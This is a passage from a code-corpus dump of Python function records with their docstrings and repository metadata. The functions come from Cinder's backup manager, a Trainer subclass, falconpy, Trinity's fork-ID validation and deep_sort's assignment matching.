%(configured_service)s does not support verify. Backup id %(id)s is not verified. Skipping verify.') % {'configured_service': self.driver_name, 'id': backup.id}) raise exception.BackupVerifyUnsupportedDriver(reason=msg) elif ((status == fields.BackupStatus.ERROR) or ((status == fields.BackupStatus.AVAILABLE) and (backup.status == fields.BackupStatus.RESTORING))): backup.status = status backup.save() except exception.InvalidBackup: with excutils.save_and_reraise_exception(): LOG.error('Backup id %s is not invalid. 
Skipping reset.', backup.id) except exception.BackupVerifyUnsupportedDriver: with excutils.save_and_reraise_exception(): LOG.error('Backup service %(configured_service)s does not support verify. Backup id %(id)s is not verified. Skipping verify.', {'configured_service': self.driver_name, 'id': backup.id}) except AttributeError: msg = (_('Backup service %(service)s does not support verify. Backup id %(id)s is not verified. Skipping reset.') % {'service': self.driver_name, 'id': backup.id}) LOG.error(msg) raise exception.BackupVerifyUnsupportedDriver(reason=msg) try: self._cleanup_temp_volumes_snapshots_for_one_backup(context, backup) except Exception: LOG.exception('Problem cleaning temp volumes and snapshots for backup %(bkup)s.', {'bkup': backup.id}) notifier_info = {'id': backup.id, 'update': {'status': status}} notifier = rpc.get_notifier('backupStatusUpdate') notifier.info(context, 'backups.reset_status.end', notifier_info)
def reset_status(self, context, backup, status): 'Reset volume backup status.\n\n :param context: running context\n :param backup: The backup object for reset status operation\n :param status: The status to be set\n :raises InvalidBackup:\n :raises BackupVerifyUnsupportedDriver:\n :raises AttributeError:\n ' LOG.info('Reset backup status started, backup_id: %(backup_id)s, status: %(status)s.', {'backup_id': backup.id, 'status': status}) backup_service_name = self._map_service_to_driver(backup.service) LOG.info('Backup service: %s.', backup_service_name) if (backup_service_name is not None): configured_service = self.driver_name if (backup_service_name not in configured_service): err = (_('Reset backup status aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service_name}) raise exception.InvalidBackup(reason=err) try: if ((status == fields.BackupStatus.AVAILABLE) and (backup['status'] != fields.BackupStatus.RESTORING)): backup_service = self.get_backup_driver(context) if isinstance(backup_service, driver.BackupDriverWithVerify): backup_service.verify(backup.id) backup.status = status backup.save() else: msg = (_('Backup service %(configured_service)s does not support verify. Backup id %(id)s is not verified. Skipping verify.') % {'configured_service': self.driver_name, 'id': backup.id}) raise exception.BackupVerifyUnsupportedDriver(reason=msg) elif ((status == fields.BackupStatus.ERROR) or ((status == fields.BackupStatus.AVAILABLE) and (backup.status == fields.BackupStatus.RESTORING))): backup.status = status backup.save() except exception.InvalidBackup: with excutils.save_and_reraise_exception(): LOG.error('Backup id %s is not invalid. 
Skipping reset.', backup.id) except exception.BackupVerifyUnsupportedDriver: with excutils.save_and_reraise_exception(): LOG.error('Backup service %(configured_service)s does not support verify. Backup id %(id)s is not verified. Skipping verify.', {'configured_service': self.driver_name, 'id': backup.id}) except AttributeError: msg = (_('Backup service %(service)s does not support verify. Backup id %(id)s is not verified. Skipping reset.') % {'service': self.driver_name, 'id': backup.id}) LOG.error(msg) raise exception.BackupVerifyUnsupportedDriver(reason=msg) try: self._cleanup_temp_volumes_snapshots_for_one_backup(context, backup) except Exception: LOG.exception('Problem cleaning temp volumes and snapshots for backup %(bkup)s.', {'bkup': backup.id}) notifier_info = {'id': backup.id, 'update': {'status': status}} notifier = rpc.get_notifier('backupStatusUpdate') notifier.info(context, 'backups.reset_status.end', notifier_info)<|docstring|>Reset volume backup status. :param context: running context :param backup: The backup object for reset status operation :param status: The status to be set :raises InvalidBackup: :raises BackupVerifyUnsupportedDriver: :raises AttributeError:<|endoftext|>
135a2f8489a1f6716eb54d6f519540473629140adc1f502315f2204fd107215a
def check_support_to_force_delete(self, context): 'Check if the backup driver supports force delete operation.\n\n :param context: running context\n ' backup_service = self.get_backup_driver(context) return backup_service.support_force_delete
Check if the backup driver supports force delete operation. :param context: running context
cinder/backup/manager.py
check_support_to_force_delete
inspur-storage/cinder
1
python
def check_support_to_force_delete(self, context): 'Check if the backup driver supports force delete operation.\n\n :param context: running context\n ' backup_service = self.get_backup_driver(context) return backup_service.support_force_delete
def check_support_to_force_delete(self, context): 'Check if the backup driver supports force delete operation.\n\n :param context: running context\n ' backup_service = self.get_backup_driver(context) return backup_service.support_force_delete<|docstring|>Check if the backup driver supports force delete operation. :param context: running context<|endoftext|>
bd2dbc3e9e6ad5bec0859f6e7600512ae18c9339002202c1d25a4084f0616f30
def _attach_device(self, ctxt, backup_device, properties, is_snapshot=False): 'Attach backup device.' if (not is_snapshot): return self._attach_volume(ctxt, backup_device, properties) else: return self._attach_snapshot(ctxt, backup_device, properties)
Attach backup device.
cinder/backup/manager.py
_attach_device
inspur-storage/cinder
1
python
def _attach_device(self, ctxt, backup_device, properties, is_snapshot=False): if (not is_snapshot): return self._attach_volume(ctxt, backup_device, properties) else: return self._attach_snapshot(ctxt, backup_device, properties)
def _attach_device(self, ctxt, backup_device, properties, is_snapshot=False): if (not is_snapshot): return self._attach_volume(ctxt, backup_device, properties) else: return self._attach_snapshot(ctxt, backup_device, properties)<|docstring|>Attach backup device.<|endoftext|>
b6c7b5f66c2467dd0c791e1e74bdec234412479bc8252b65614d5e7aca89ec30
def _attach_volume(self, context, volume, properties): 'Attach a volume.' try: conn = self.volume_rpcapi.initialize_connection(context, volume, properties) return self._connect_device(conn) except Exception: with excutils.save_and_reraise_exception(): try: self.volume_rpcapi.terminate_connection(context, volume, properties, force=True) except Exception: LOG.warning('Failed to terminate the connection of volume %(volume_id)s, but it is acceptable.', {'volume_id', volume.id})
Attach a volume.
cinder/backup/manager.py
_attach_volume
inspur-storage/cinder
1
python
def _attach_volume(self, context, volume, properties): try: conn = self.volume_rpcapi.initialize_connection(context, volume, properties) return self._connect_device(conn) except Exception: with excutils.save_and_reraise_exception(): try: self.volume_rpcapi.terminate_connection(context, volume, properties, force=True) except Exception: LOG.warning('Failed to terminate the connection of volume %(volume_id)s, but it is acceptable.', {'volume_id', volume.id})
def _attach_volume(self, context, volume, properties): try: conn = self.volume_rpcapi.initialize_connection(context, volume, properties) return self._connect_device(conn) except Exception: with excutils.save_and_reraise_exception(): try: self.volume_rpcapi.terminate_connection(context, volume, properties, force=True) except Exception: LOG.warning('Failed to terminate the connection of volume %(volume_id)s, but it is acceptable.', {'volume_id', volume.id})<|docstring|>Attach a volume.<|endoftext|>
78147b47019286c8a9ca328c58acc792052da5ff60a3ab228ec027d5c5ddf426
def _attach_snapshot(self, ctxt, snapshot, properties): 'Attach a snapshot.' try: conn = self.volume_rpcapi.initialize_connection_snapshot(ctxt, snapshot, properties) return self._connect_device(conn) except Exception: with excutils.save_and_reraise_exception(): try: self.volume_rpcapi.terminate_connection_snapshot(ctxt, snapshot, properties, force=True) except Exception: LOG.warning('Failed to terminate the connection of snapshot %(snapshot_id)s, but it is acceptable.', {'snapshot_id', snapshot.id})
Attach a snapshot.
cinder/backup/manager.py
_attach_snapshot
inspur-storage/cinder
1
python
def _attach_snapshot(self, ctxt, snapshot, properties): try: conn = self.volume_rpcapi.initialize_connection_snapshot(ctxt, snapshot, properties) return self._connect_device(conn) except Exception: with excutils.save_and_reraise_exception(): try: self.volume_rpcapi.terminate_connection_snapshot(ctxt, snapshot, properties, force=True) except Exception: LOG.warning('Failed to terminate the connection of snapshot %(snapshot_id)s, but it is acceptable.', {'snapshot_id', snapshot.id})
def _attach_snapshot(self, ctxt, snapshot, properties): try: conn = self.volume_rpcapi.initialize_connection_snapshot(ctxt, snapshot, properties) return self._connect_device(conn) except Exception: with excutils.save_and_reraise_exception(): try: self.volume_rpcapi.terminate_connection_snapshot(ctxt, snapshot, properties, force=True) except Exception: LOG.warning('Failed to terminate the connection of snapshot %(snapshot_id)s, but it is acceptable.', {'snapshot_id', snapshot.id})<|docstring|>Attach a snapshot.<|endoftext|>
1d4cff7c35020e308945ab38a7d4609ec0d8f970f6c4f05ea56f222c5f75f6c9
def _connect_device(self, conn): 'Establish connection to device.' use_multipath = CONF.use_multipath_for_image_xfer device_scan_attempts = CONF.num_volume_device_scan_tries protocol = conn['driver_volume_type'] connector = utils.brick_get_connector(protocol, use_multipath=use_multipath, device_scan_attempts=device_scan_attempts, conn=conn) vol_handle = connector.connect_volume(conn['data']) return {'conn': conn, 'device': vol_handle, 'connector': connector}
Establish connection to device.
cinder/backup/manager.py
_connect_device
inspur-storage/cinder
1
python
def _connect_device(self, conn): use_multipath = CONF.use_multipath_for_image_xfer device_scan_attempts = CONF.num_volume_device_scan_tries protocol = conn['driver_volume_type'] connector = utils.brick_get_connector(protocol, use_multipath=use_multipath, device_scan_attempts=device_scan_attempts, conn=conn) vol_handle = connector.connect_volume(conn['data']) return {'conn': conn, 'device': vol_handle, 'connector': connector}
def _connect_device(self, conn): use_multipath = CONF.use_multipath_for_image_xfer device_scan_attempts = CONF.num_volume_device_scan_tries protocol = conn['driver_volume_type'] connector = utils.brick_get_connector(protocol, use_multipath=use_multipath, device_scan_attempts=device_scan_attempts, conn=conn) vol_handle = connector.connect_volume(conn['data']) return {'conn': conn, 'device': vol_handle, 'connector': connector}<|docstring|>Establish connection to device.<|endoftext|>
113a20b88f005418cca585a3a4a9a590ceb246a8de4484e8c0f8225c8d20525f
def _detach_device(self, ctxt, attach_info, device, properties, is_snapshot=False, force=False, ignore_errors=False): 'Disconnect the volume or snapshot from the host. ' connector = attach_info['connector'] connector.disconnect_volume(attach_info['conn']['data'], attach_info['device'], force=force, ignore_errors=ignore_errors) rpcapi = self.volume_rpcapi if (not is_snapshot): rpcapi.terminate_connection(ctxt, device, properties, force=force) rpcapi.remove_export(ctxt, device) else: rpcapi.terminate_connection_snapshot(ctxt, device, properties, force=force) rpcapi.remove_export_snapshot(ctxt, device)
Disconnect the volume or snapshot from the host.
cinder/backup/manager.py
_detach_device
inspur-storage/cinder
1
python
def _detach_device(self, ctxt, attach_info, device, properties, is_snapshot=False, force=False, ignore_errors=False): ' ' connector = attach_info['connector'] connector.disconnect_volume(attach_info['conn']['data'], attach_info['device'], force=force, ignore_errors=ignore_errors) rpcapi = self.volume_rpcapi if (not is_snapshot): rpcapi.terminate_connection(ctxt, device, properties, force=force) rpcapi.remove_export(ctxt, device) else: rpcapi.terminate_connection_snapshot(ctxt, device, properties, force=force) rpcapi.remove_export_snapshot(ctxt, device)
def _detach_device(self, ctxt, attach_info, device, properties, is_snapshot=False, force=False, ignore_errors=False): ' ' connector = attach_info['connector'] connector.disconnect_volume(attach_info['conn']['data'], attach_info['device'], force=force, ignore_errors=ignore_errors) rpcapi = self.volume_rpcapi if (not is_snapshot): rpcapi.terminate_connection(ctxt, device, properties, force=force) rpcapi.remove_export(ctxt, device) else: rpcapi.terminate_connection_snapshot(ctxt, device, properties, force=force) rpcapi.remove_export_snapshot(ctxt, device)<|docstring|>Disconnect the volume or snapshot from the host.<|endoftext|>
d1419e640a7d913f8e05105ba6633db6969f356b969e4825f98668ade3e26e7d
def compute_loss(self, model, inputs, return_outputs=False): '\n How the loss is computed by Trainer. By default, all models return the loss in the first element.\n\n Subclass and override for custom behavior.\n ' if ((self.label_smoother is not None) and ('labels' in inputs)): labels = inputs.pop('labels') else: labels = None outputs = model(**inputs) if (self.args.past_index >= 0): self._past = outputs[self.args.past_index] if (labels is not None): loss = self.label_smoother(outputs, labels) else: loss = (outputs['loss'] if isinstance(outputs, dict) else outputs[0]) return ((loss, outputs) if return_outputs else loss)
How the loss is computed by Trainer. By default, all models return the loss in the first element. Subclass and override for custom behavior.
src/magic_box/train_qa.py
compute_loss
Oh-Donggyu/mrc-level2-nlp-01
1
python
def compute_loss(self, model, inputs, return_outputs=False): '\n How the loss is computed by Trainer. By default, all models return the loss in the first element.\n\n Subclass and override for custom behavior.\n ' if ((self.label_smoother is not None) and ('labels' in inputs)): labels = inputs.pop('labels') else: labels = None outputs = model(**inputs) if (self.args.past_index >= 0): self._past = outputs[self.args.past_index] if (labels is not None): loss = self.label_smoother(outputs, labels) else: loss = (outputs['loss'] if isinstance(outputs, dict) else outputs[0]) return ((loss, outputs) if return_outputs else loss)
def compute_loss(self, model, inputs, return_outputs=False): '\n How the loss is computed by Trainer. By default, all models return the loss in the first element.\n\n Subclass and override for custom behavior.\n ' if ((self.label_smoother is not None) and ('labels' in inputs)): labels = inputs.pop('labels') else: labels = None outputs = model(**inputs) if (self.args.past_index >= 0): self._past = outputs[self.args.past_index] if (labels is not None): loss = self.label_smoother(outputs, labels) else: loss = (outputs['loss'] if isinstance(outputs, dict) else outputs[0]) return ((loss, outputs) if return_outputs else loss)<|docstring|>How the loss is computed by Trainer. By default, all models return the loss in the first element. Subclass and override for custom behavior.<|endoftext|>
4326d5884548a59f89e1adf05590035975fa02cc228c77abd57cb776d633eb77
def get_eval_dataloader(self, eval_dataset: Optional[Dataset]=None) -> DataLoader: '\n Returns the evaluation :class:`~torch.utils.data.DataLoader`.\n\n Subclass and override this method if you want to inject some custom behavior.\n\n Args:\n eval_dataset (:obj:`torch.utils.data.Dataset`, `optional`):\n If provided, will override :obj:`self.eval_dataset`. If it is an :obj:`datasets.Dataset`, columns not\n accepted by the ``model.forward()`` method are automatically removed. It must implement :obj:`__len__`.\n ' if ((eval_dataset is None) and (self.eval_dataset is None)): raise ValueError('Trainer: evaluation requires an eval_dataset.') eval_dataset = (eval_dataset if (eval_dataset is not None) else self.eval_dataset) if (is_datasets_available() and isinstance(eval_dataset, datasets.Dataset)): eval_dataset = self._remove_unused_columns(eval_dataset, description='evaluation') if isinstance(eval_dataset, torch.utils.data.IterableDataset): if (self.args.world_size > 1): eval_dataset = IterableDatasetShard(eval_dataset, batch_size=self.args.eval_batch_size, drop_last=self.args.dataloader_drop_last, num_processes=self.args.world_size, process_index=self.args.process_index) return DataLoader(eval_dataset, batch_size=self.args.eval_batch_size, collate_fn=default_data_collator, num_workers=self.args.dataloader_num_workers, pin_memory=self.args.dataloader_pin_memory) eval_sampler = self._get_eval_sampler(eval_dataset) return DataLoader(eval_dataset, sampler=eval_sampler, batch_size=self.args.eval_batch_size, collate_fn=default_data_collator, drop_last=self.args.dataloader_drop_last, num_workers=self.args.dataloader_num_workers, pin_memory=self.args.dataloader_pin_memory)
Returns the evaluation :class:`~torch.utils.data.DataLoader`. Subclass and override this method if you want to inject some custom behavior. Args: eval_dataset (:obj:`torch.utils.data.Dataset`, `optional`): If provided, will override :obj:`self.eval_dataset`. If it is an :obj:`datasets.Dataset`, columns not accepted by the ``model.forward()`` method are automatically removed. It must implement :obj:`__len__`.
src/magic_box/train_qa.py
get_eval_dataloader
Oh-Donggyu/mrc-level2-nlp-01
1
python
def get_eval_dataloader(self, eval_dataset: Optional[Dataset]=None) -> DataLoader: '\n Returns the evaluation :class:`~torch.utils.data.DataLoader`.\n\n Subclass and override this method if you want to inject some custom behavior.\n\n Args:\n eval_dataset (:obj:`torch.utils.data.Dataset`, `optional`):\n If provided, will override :obj:`self.eval_dataset`. If it is an :obj:`datasets.Dataset`, columns not\n accepted by the ``model.forward()`` method are automatically removed. It must implement :obj:`__len__`.\n ' if ((eval_dataset is None) and (self.eval_dataset is None)): raise ValueError('Trainer: evaluation requires an eval_dataset.') eval_dataset = (eval_dataset if (eval_dataset is not None) else self.eval_dataset) if (is_datasets_available() and isinstance(eval_dataset, datasets.Dataset)): eval_dataset = self._remove_unused_columns(eval_dataset, description='evaluation') if isinstance(eval_dataset, torch.utils.data.IterableDataset): if (self.args.world_size > 1): eval_dataset = IterableDatasetShard(eval_dataset, batch_size=self.args.eval_batch_size, drop_last=self.args.dataloader_drop_last, num_processes=self.args.world_size, process_index=self.args.process_index) return DataLoader(eval_dataset, batch_size=self.args.eval_batch_size, collate_fn=default_data_collator, num_workers=self.args.dataloader_num_workers, pin_memory=self.args.dataloader_pin_memory) eval_sampler = self._get_eval_sampler(eval_dataset) return DataLoader(eval_dataset, sampler=eval_sampler, batch_size=self.args.eval_batch_size, collate_fn=default_data_collator, drop_last=self.args.dataloader_drop_last, num_workers=self.args.dataloader_num_workers, pin_memory=self.args.dataloader_pin_memory)
def get_eval_dataloader(self, eval_dataset: Optional[Dataset]=None) -> DataLoader: '\n Returns the evaluation :class:`~torch.utils.data.DataLoader`.\n\n Subclass and override this method if you want to inject some custom behavior.\n\n Args:\n eval_dataset (:obj:`torch.utils.data.Dataset`, `optional`):\n If provided, will override :obj:`self.eval_dataset`. If it is an :obj:`datasets.Dataset`, columns not\n accepted by the ``model.forward()`` method are automatically removed. It must implement :obj:`__len__`.\n ' if ((eval_dataset is None) and (self.eval_dataset is None)): raise ValueError('Trainer: evaluation requires an eval_dataset.') eval_dataset = (eval_dataset if (eval_dataset is not None) else self.eval_dataset) if (is_datasets_available() and isinstance(eval_dataset, datasets.Dataset)): eval_dataset = self._remove_unused_columns(eval_dataset, description='evaluation') if isinstance(eval_dataset, torch.utils.data.IterableDataset): if (self.args.world_size > 1): eval_dataset = IterableDatasetShard(eval_dataset, batch_size=self.args.eval_batch_size, drop_last=self.args.dataloader_drop_last, num_processes=self.args.world_size, process_index=self.args.process_index) return DataLoader(eval_dataset, batch_size=self.args.eval_batch_size, collate_fn=default_data_collator, num_workers=self.args.dataloader_num_workers, pin_memory=self.args.dataloader_pin_memory) eval_sampler = self._get_eval_sampler(eval_dataset) return DataLoader(eval_dataset, sampler=eval_sampler, batch_size=self.args.eval_batch_size, collate_fn=default_data_collator, drop_last=self.args.dataloader_drop_last, num_workers=self.args.dataloader_num_workers, pin_memory=self.args.dataloader_pin_memory)<|docstring|>Returns the evaluation :class:`~torch.utils.data.DataLoader`. Subclass and override this method if you want to inject some custom behavior. Args: eval_dataset (:obj:`torch.utils.data.Dataset`, `optional`): If provided, will override :obj:`self.eval_dataset`. 
If it is an :obj:`datasets.Dataset`, columns not accepted by the ``model.forward()`` method are automatically removed. It must implement :obj:`__len__`.<|endoftext|>
feeff17ccefc5784c319e3effb7d95b87c75c4a4e264c38142ccee13ccc2acfc
@force_default(defaults=['parameters'], default_types=['dict']) def get_assessment(self: object, parameters: dict=None, **kwargs) -> dict: '\n Get Zero Trust Assessment data for one or more hosts by providing agent IDs (AID) and a customer ID (CID).\n ' return process_service_request(calling_object=self, endpoints=Endpoints, operation_id='getAssessmentV1', keywords=kwargs, params=parameters)
Get Zero Trust Assessment data for one or more hosts by providing agent IDs (AID) and a customer ID (CID).
src/falconpy/zero_trust_assessment.py
get_assessment
woodtechie1428/falconpy
0
python
@force_default(defaults=['parameters'], default_types=['dict']) def get_assessment(self: object, parameters: dict=None, **kwargs) -> dict: '\n \n ' return process_service_request(calling_object=self, endpoints=Endpoints, operation_id='getAssessmentV1', keywords=kwargs, params=parameters)
@force_default(defaults=['parameters'], default_types=['dict']) def get_assessment(self: object, parameters: dict=None, **kwargs) -> dict: '\n \n ' return process_service_request(calling_object=self, endpoints=Endpoints, operation_id='getAssessmentV1', keywords=kwargs, params=parameters)<|docstring|>Get Zero Trust Assessment data for one or more hosts by providing agent IDs (AID) and a customer ID (CID).<|endoftext|>
67fb4bda8f63a5b56e9f083a06bd2e8c0ba671d97a4cbb19e98a73f61b32d8a3
def get_compliance(self: object) -> dict: '\n Get the Zero Trust Assessment compliance report for one customer ID (CID).\n ' return process_service_request(calling_object=self, endpoints=Endpoints, operation_id='getComplianceV1')
Get the Zero Trust Assessment compliance report for one customer ID (CID).
src/falconpy/zero_trust_assessment.py
get_compliance
woodtechie1428/falconpy
0
python
def get_compliance(self: object) -> dict: '\n \n ' return process_service_request(calling_object=self, endpoints=Endpoints, operation_id='getComplianceV1')
def get_compliance(self: object) -> dict: '\n \n ' return process_service_request(calling_object=self, endpoints=Endpoints, operation_id='getComplianceV1')<|docstring|>Get the Zero Trust Assessment compliance report for one customer ID (CID).<|endoftext|>
6d1b09f526f079a1ae906be23cbe92e0e4d6044c2683f580e079a3b16c28f288
def validate_forkid(forkid: ForkID, genesis_hash: Hash32, head: BlockNumber, fork_blocks: Tuple[(BlockNumber, ...)]) -> None: '\n Validate the given ForkID against our current state.\n\n Validation rules are described at\n https://github.com/ethereum/EIPs/blob/master/EIPS/eip-2124.md#validation-rules\n ' fork_blocks_list = list(fork_blocks) checksums = [binascii.crc32(genesis_hash)] for block_number in fork_blocks_list: block_number_as_bytes = block_number.to_bytes(8, 'big') checksums.append(binascii.crc32(block_number_as_bytes, checksums[(- 1)])) fork_blocks_list.append(BlockNumber(sys.maxsize)) for (i, block_number) in enumerate(fork_blocks_list): if (head > block_number): continue if (_crc_to_bytes(checksums[i]) == forkid.hash): if ((forkid.next > 0) and (head >= forkid.next)): raise LocalChainIncompatibleOrStale('rule 1a') return for (b, checksum) in itertools.zip_longest(fork_blocks_list[:i], checksums[:i]): if (_crc_to_bytes(checksum) == forkid.hash): if (b != forkid.next): raise RemoteChainIsStale() return for checksum in checksums[i:]: if (_crc_to_bytes(checksum) == forkid.hash): return raise LocalChainIncompatibleOrStale('different chains') logging.getLogger('p2p').error('Impossible forkid validation for %s', forkid)
Validate the given ForkID against our current state. Validation rules are described at https://github.com/ethereum/EIPs/blob/master/EIPS/eip-2124.md#validation-rules
trinity/protocol/eth/forkid.py
validate_forkid
indi-ca/trinity
1
python
def validate_forkid(forkid: ForkID, genesis_hash: Hash32, head: BlockNumber, fork_blocks: Tuple[(BlockNumber, ...)]) -> None: '\n Validate the given ForkID against our current state.\n\n Validation rules are described at\n https://github.com/ethereum/EIPs/blob/master/EIPS/eip-2124.md#validation-rules\n ' fork_blocks_list = list(fork_blocks) checksums = [binascii.crc32(genesis_hash)] for block_number in fork_blocks_list: block_number_as_bytes = block_number.to_bytes(8, 'big') checksums.append(binascii.crc32(block_number_as_bytes, checksums[(- 1)])) fork_blocks_list.append(BlockNumber(sys.maxsize)) for (i, block_number) in enumerate(fork_blocks_list): if (head > block_number): continue if (_crc_to_bytes(checksums[i]) == forkid.hash): if ((forkid.next > 0) and (head >= forkid.next)): raise LocalChainIncompatibleOrStale('rule 1a') return for (b, checksum) in itertools.zip_longest(fork_blocks_list[:i], checksums[:i]): if (_crc_to_bytes(checksum) == forkid.hash): if (b != forkid.next): raise RemoteChainIsStale() return for checksum in checksums[i:]: if (_crc_to_bytes(checksum) == forkid.hash): return raise LocalChainIncompatibleOrStale('different chains') logging.getLogger('p2p').error('Impossible forkid validation for %s', forkid)
def validate_forkid(forkid: ForkID, genesis_hash: Hash32, head: BlockNumber, fork_blocks: Tuple[(BlockNumber, ...)]) -> None: '\n Validate the given ForkID against our current state.\n\n Validation rules are described at\n https://github.com/ethereum/EIPs/blob/master/EIPS/eip-2124.md#validation-rules\n ' fork_blocks_list = list(fork_blocks) checksums = [binascii.crc32(genesis_hash)] for block_number in fork_blocks_list: block_number_as_bytes = block_number.to_bytes(8, 'big') checksums.append(binascii.crc32(block_number_as_bytes, checksums[(- 1)])) fork_blocks_list.append(BlockNumber(sys.maxsize)) for (i, block_number) in enumerate(fork_blocks_list): if (head > block_number): continue if (_crc_to_bytes(checksums[i]) == forkid.hash): if ((forkid.next > 0) and (head >= forkid.next)): raise LocalChainIncompatibleOrStale('rule 1a') return for (b, checksum) in itertools.zip_longest(fork_blocks_list[:i], checksums[:i]): if (_crc_to_bytes(checksum) == forkid.hash): if (b != forkid.next): raise RemoteChainIsStale() return for checksum in checksums[i:]: if (_crc_to_bytes(checksum) == forkid.hash): return raise LocalChainIncompatibleOrStale('different chains') logging.getLogger('p2p').error('Impossible forkid validation for %s', forkid)<|docstring|>Validate the given ForkID against our current state. Validation rules are described at https://github.com/ethereum/EIPs/blob/master/EIPS/eip-2124.md#validation-rules<|endoftext|>
ea409c269e0588c52dda98d18afe126f0b26a1bf403f9ce119a34da8f97bafac
def min_cost_matching(distance_metric, max_distance, tracks, detections, track_indices=None, detection_indices=None): 'Solve linear assignment problem.\n\n Parameters\n ----------\n distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray\n The distance metric is given a list of tracks and detections as well as\n a list of N track indices and M detection indices. The metric should\n return the NxM dimensional cost matrix, where element (i, j) is the\n association cost between the i-th track in the given track indices and\n the j-th detection in the given detection_indices.\n max_distance : float\n Gating threshold. Associations with cost larger than this value are\n disregarded.\n tracks : List[track.Track]\n A list of predicted tracks at the current time step.\n detections : List[detection.Detection]\n A list of detections at the current time step.\n track_indices : List[int]\n List of track indices that maps rows in `cost_matrix` to tracks in\n `tracks` (see description above).\n detection_indices : List[int]\n List of detection indices that maps columns in `cost_matrix` to\n detections in `detections` (see description above).\n\n Returns\n -------\n (List[(int, int)], List[int], List[int])\n Returns a tuple with the following three entries:\n * A list of matched track and detection indices.\n * A list of unmatched track indices.\n * A list of unmatched detection indices.\n\n ' if (track_indices is None): track_indices = np.arange(len(tracks)) if (detection_indices is None): detection_indices = np.arange(len(detections)) if ((len(detection_indices) == 0) or (len(track_indices) == 0)): return ([], track_indices, detection_indices) cost_matrix = distance_metric(tracks, detections, track_indices, detection_indices) cost_matrix[(cost_matrix > max_distance)] = (max_distance + 1e-05) (row_indices, col_indices) = linear_assignment(cost_matrix) (matches, unmatched_tracks, unmatched_detections) = ([], [], []) for (col, detection_idx) in 
enumerate(detection_indices): if (col not in col_indices): unmatched_detections.append(detection_idx) for (row, track_idx) in enumerate(track_indices): if (row not in row_indices): unmatched_tracks.append(track_idx) for (row, col) in zip(row_indices, col_indices): track_idx = track_indices[row] detection_idx = detection_indices[col] if (cost_matrix[(row, col)] > max_distance): unmatched_tracks.append(track_idx) unmatched_detections.append(detection_idx) else: matches.append((track_idx, detection_idx)) return (matches, unmatched_tracks, unmatched_detections)
Solve linear assignment problem. Parameters ---------- distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray The distance metric is given a list of tracks and detections as well as a list of N track indices and M detection indices. The metric should return the NxM dimensional cost matrix, where element (i, j) is the association cost between the i-th track in the given track indices and the j-th detection in the given detection_indices. max_distance : float Gating threshold. Associations with cost larger than this value are disregarded. tracks : List[track.Track] A list of predicted tracks at the current time step. detections : List[detection.Detection] A list of detections at the current time step. track_indices : List[int] List of track indices that maps rows in `cost_matrix` to tracks in `tracks` (see description above). detection_indices : List[int] List of detection indices that maps columns in `cost_matrix` to detections in `detections` (see description above). Returns ------- (List[(int, int)], List[int], List[int]) Returns a tuple with the following three entries: * A list of matched track and detection indices. * A list of unmatched track indices. * A list of unmatched detection indices.
deep_sort_pytorch/deep_sort/sort/linear_assignment.py
min_cost_matching
JisuHann/Autonomous-Driving-Cart-MEME
2,175
python
def min_cost_matching(distance_metric, max_distance, tracks, detections, track_indices=None, detection_indices=None): 'Solve linear assignment problem.\n\n Parameters\n ----------\n distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray\n The distance metric is given a list of tracks and detections as well as\n a list of N track indices and M detection indices. The metric should\n return the NxM dimensional cost matrix, where element (i, j) is the\n association cost between the i-th track in the given track indices and\n the j-th detection in the given detection_indices.\n max_distance : float\n Gating threshold. Associations with cost larger than this value are\n disregarded.\n tracks : List[track.Track]\n A list of predicted tracks at the current time step.\n detections : List[detection.Detection]\n A list of detections at the current time step.\n track_indices : List[int]\n List of track indices that maps rows in `cost_matrix` to tracks in\n `tracks` (see description above).\n detection_indices : List[int]\n List of detection indices that maps columns in `cost_matrix` to\n detections in `detections` (see description above).\n\n Returns\n -------\n (List[(int, int)], List[int], List[int])\n Returns a tuple with the following three entries:\n * A list of matched track and detection indices.\n * A list of unmatched track indices.\n * A list of unmatched detection indices.\n\n ' if (track_indices is None): track_indices = np.arange(len(tracks)) if (detection_indices is None): detection_indices = np.arange(len(detections)) if ((len(detection_indices) == 0) or (len(track_indices) == 0)): return ([], track_indices, detection_indices) cost_matrix = distance_metric(tracks, detections, track_indices, detection_indices) cost_matrix[(cost_matrix > max_distance)] = (max_distance + 1e-05) (row_indices, col_indices) = linear_assignment(cost_matrix) (matches, unmatched_tracks, unmatched_detections) = ([], [], []) for (col, detection_idx) in 
enumerate(detection_indices): if (col not in col_indices): unmatched_detections.append(detection_idx) for (row, track_idx) in enumerate(track_indices): if (row not in row_indices): unmatched_tracks.append(track_idx) for (row, col) in zip(row_indices, col_indices): track_idx = track_indices[row] detection_idx = detection_indices[col] if (cost_matrix[(row, col)] > max_distance): unmatched_tracks.append(track_idx) unmatched_detections.append(detection_idx) else: matches.append((track_idx, detection_idx)) return (matches, unmatched_tracks, unmatched_detections)
def min_cost_matching(distance_metric, max_distance, tracks, detections, track_indices=None, detection_indices=None): 'Solve linear assignment problem.\n\n Parameters\n ----------\n distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray\n The distance metric is given a list of tracks and detections as well as\n a list of N track indices and M detection indices. The metric should\n return the NxM dimensional cost matrix, where element (i, j) is the\n association cost between the i-th track in the given track indices and\n the j-th detection in the given detection_indices.\n max_distance : float\n Gating threshold. Associations with cost larger than this value are\n disregarded.\n tracks : List[track.Track]\n A list of predicted tracks at the current time step.\n detections : List[detection.Detection]\n A list of detections at the current time step.\n track_indices : List[int]\n List of track indices that maps rows in `cost_matrix` to tracks in\n `tracks` (see description above).\n detection_indices : List[int]\n List of detection indices that maps columns in `cost_matrix` to\n detections in `detections` (see description above).\n\n Returns\n -------\n (List[(int, int)], List[int], List[int])\n Returns a tuple with the following three entries:\n * A list of matched track and detection indices.\n * A list of unmatched track indices.\n * A list of unmatched detection indices.\n\n ' if (track_indices is None): track_indices = np.arange(len(tracks)) if (detection_indices is None): detection_indices = np.arange(len(detections)) if ((len(detection_indices) == 0) or (len(track_indices) == 0)): return ([], track_indices, detection_indices) cost_matrix = distance_metric(tracks, detections, track_indices, detection_indices) cost_matrix[(cost_matrix > max_distance)] = (max_distance + 1e-05) (row_indices, col_indices) = linear_assignment(cost_matrix) (matches, unmatched_tracks, unmatched_detections) = ([], [], []) for (col, detection_idx) in 
